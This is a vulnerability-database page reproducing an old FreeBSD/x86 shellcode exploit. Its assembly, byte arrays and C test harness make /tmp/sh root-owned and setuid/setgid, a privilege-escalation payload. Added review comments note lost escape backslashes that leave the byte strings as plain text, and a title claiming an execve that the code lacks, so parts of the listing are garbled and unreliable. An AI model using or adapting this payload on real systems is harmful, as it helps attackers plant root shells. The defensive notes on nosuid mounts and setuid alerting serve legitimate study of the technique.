FreeBSD/x86 – chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)
漏洞ID | 1054673 | 漏洞类型 | |
发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | FreeBSD_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* FreeBSD shellcode
* chown("/tmp/sh", 0, 0); chmod("/tmp/sh", 06755);
* 44 bytes
*
* Claes M. Nyberg 20020209
*
* <[email protected]>, <[email protected]>
*/
/*************************************************************
void
main(void)
{
__asm__("
xor %eax, %eax # eax = 0
pushl %eax # four zero bytes: NUL terminator for the path string
pushl $0x68732f2f # push 'hs//' (//sh)
pushl $0x706d742f # push 'pmt/' (/tmp)
movl %esp, %ebx # ebx = &string[0]
push %eax # 0
push %eax # 0
push %ebx # /tmp/sh
push %eax # Dummy
mov $0x10, %al # eax = 16 = chown
int $0x80 # chown(/tmp/sh, 0, 0);
xor %eax, %eax # eax = 0
or $0xded, %ax # eax = 06755
pushl %eax # 06755
push %ebx # /tmp/sh
pushl %eax # dummy
xor %eax, %eax # eax = 0
mov $0xf, %al # eax = 15 = chmod
int $0x80 # chmod(/tmp/sh, 06755);
mov $0x1, %al # eax = 1 = exit
push %eax # exit value = 1
push %eax # Dummy
int $0x80 # exit(1);
");
}
*************************************************************/
#include <stdio.h>
#include <string.h>
/*
 * Annotated copy of the 44-byte payload, one instruction per line, with the
 * AT&T mnemonic for each byte group in the trailing comment. In this file it
 * is only read by main(), which passes it to strlen().
 *
 * NOTE(review): the escape backslashes were lost when this page was extracted
 * (each "xNN" group stood for one "\xNN" byte), so as printed the literal is
 * plain ASCII text, three characters per intended byte, and not machine code.
 *
 * What the listed instructions do (FreeBSD/i386, int $0x80 system calls):
 *   1. push a zero dword and the bytes of "/tmp//sh", leaving %ebx = path;
 *   2. system call 16: chown(path, 0, 0);
 *   3. system call 15: chmod(path, 06755); 0x0ded == 06755, i.e. setuid +
 *      setgid + rwxr-xr-x;
 *   4. system call 1: exit(1).
 * The listing contains no execve call, although the page title mentions one.
 *
 * Defender's view: the visible effect is a root-owned setuid/setgid file
 * under /tmp. Giving a file to uid 0 normally requires superuser privilege,
 * so the sequence only has an effect inside an already-privileged process.
 * Mounting /tmp with nosuid and alerting on new setuid/setgid files outside
 * the system directories both cover this behaviour.
 */
static char freebsd_code[] =
"x31xc0" /* xor %eax, %eax */
"x50" /* pushl %eax */
"x68x2fx2fx73x68" /* pushl $0x68732f2f */
"x68x2fx74x6dx70" /* pushl $0x706d742f */
"x89xe3" /* movl %esp, %ebx */
"x50" /* pushl %eax */
"x50" /* pushl %eax */
"x53" /* pushl %ebx */
"x50" /* pushl %eax */
"xb0x10" /* mov $0x10, %al */
"xcdx80" /* int $0x80 */
"x31xc0" /* xor %eax, %eax */
"x66x0dxedx0d" /* or $0xded, %ax */
"x50" /* pushl %eax */
"x53" /* push %ebx */
"x50" /* pushl %eax */
"x31xc0" /* xor %eax, %eax */
"xb0x0f" /* mov $0xf, %al */
"xcdx80" /* int $0x80 */
"xb0x01" /* mov $0x1, %al */
"x50" /* push %eax */
"x50" /* push %eax */
"xcdx80"; /* int $0x80 */
/*
 * Packed copy of the same 44 byte values as freebsd_code, eight per line and
 * without per-instruction comments. This is the array main() casts to a
 * function pointer and calls.
 *
 * NOTE(review): as with freebsd_code, the "\x" escape backslashes are missing
 * from this extracted listing, so the literal shown here is ASCII text.
 * NOTE(review): a file-scope identifier beginning with an underscore is
 * reserved for the implementation in ISO C; a name such as
 * freebsd_code_packed would avoid that.
 */
static char _freebsd_code[] =
"x31xc0x50x68x2fx2fx73x68"
"x68x2fx74x6dx70x89xe3x50"
"x50x53x50xb0x10xcdx80x31"
"xc0x66x0dxedx0dx50x53x50"
"x31xc0xb0x0fxcdx80xb0x01"
"x50x50xcdx80";
/*
 * Test harness: prints the strlen() of the annotated array, then calls the
 * packed array as if it were a function taking no arguments.
 *
 * NOTE(review): `void main(void)` is not one of the standard hosted
 * signatures; `int main(void)` is the portable form.
 */
void
main(void)
{
/*
 * Converting an object pointer to a function pointer is not defined by ISO C.
 * Whether the later call runs at all presumably depends on the platform
 * mapping this static data as executable -- TODO confirm for the target.
 */
void (*code)() = (void *)_freebsd_code;
/*
 * NOTE(review): strlen() returns size_t, so `%d` is a format/argument
 * mismatch (`%zu` matches). The trailing "n" is presumably a "\n" whose
 * backslash was lost in extraction. strlen() also stops at the first zero
 * byte, so it reports the full length only for a payload with no NUL bytes.
 */
printf("strlen code: %dn", strlen(freebsd_code));
/* Transfers control into the data buffer; nothing in main() runs after it if the payload reaches its exit(1). */
code();
}
// milw0rm.com [2004-09-26]